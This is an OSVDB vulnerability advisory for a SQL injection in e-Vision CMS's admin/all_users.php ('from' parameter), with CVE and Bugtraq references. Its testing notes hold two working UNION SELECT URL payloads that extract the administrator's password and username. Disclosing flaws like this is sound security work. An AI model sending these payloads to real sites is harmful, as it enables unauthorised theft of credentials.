e-Vision CMS admin/all_users.php from Variable SQL Injection

2006-09-22T08:18:59
ID OSVDB:29105
Type osvdb
Reporter OSVDB
Modified 2006-09-22T08:18:59

Description

Manual Testing Notes

/admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*

/admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*

References:

Vendor URL: http://sourceforge.net/projects/e-vision/ Secunia Advisory ID:21969 Related OSVDB ID: 29104 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0355.html FrSIRT Advisory: ADV-2006-3764 CVE-2006-5017 Bugtraq ID: 20147